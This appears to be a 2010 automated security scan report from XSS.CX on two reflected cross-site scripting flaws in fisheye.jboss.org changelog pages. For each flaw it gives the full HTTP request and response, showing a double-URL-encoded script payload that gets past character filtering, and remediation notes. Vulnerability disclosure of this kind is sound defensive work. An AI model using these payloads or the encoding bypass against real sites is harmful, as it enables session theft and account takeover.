Report generated by XSS.CX at Mon Nov 15 10:40:19 CST 2010.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://fisheye.jboss.org/changelog/~feedspan=1mo,feedmax=50/Seam [REST URL parameter 2]

1.2. http://fisheye.jboss.org/changelog/~feedspan=1mo,feedmax=50/weld [REST URL parameter 2]



1. Cross-site scripting (reflected)
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://fisheye.jboss.org/changelog/~feedspan=1mo,feedmax=50/Seam [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisheye.jboss.org
Path:   /changelog/~feedspan=1mo,feedmax=50/Seam

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b441%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06c6c8f234b was submitted in the REST URL parameter 2. This input was echoed as 1b441"><script>alert(1)</script>06c6c8f234b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /changelog/~feedspan1b441%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06c6c8f234b=1mo,feedmax=50/Seam HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:35:14 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 324712


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Activity Seam/</title>


<link rel="SHORT
...[SNIP]...
<form action="/changelog/~feedspan1b441"><script>alert(1)</script>06c6c8f234b=1mo,feedmax=50/Seam/" class="changelog-form">
...[SNIP]...

1.2. http://fisheye.jboss.org/changelog/~feedspan=1mo,feedmax=50/weld [REST URL parameter 2]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisheye.jboss.org
Path:   /changelog/~feedspan=1mo,feedmax=50/weld

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6f00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee171f9e0308 was submitted in the REST URL parameter 2. This input was echoed as a6f00"><script>alert(1)</script>e171f9e0308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /changelog/~feedspana6f00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee171f9e0308=1mo,feedmax=50/weld HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:35:17 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 305553


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Activity weld/</title>


<link rel="SHORT
...[SNIP]...
<form action="/changelog/~feedspana6f00"><script>alert(1)</script>e171f9e0308=1mo,feedmax=50/weld/" class="changelog-form">
...[SNIP]...

Report generated by XSS.CX at Mon Nov 15 10:40:19 CST 2010.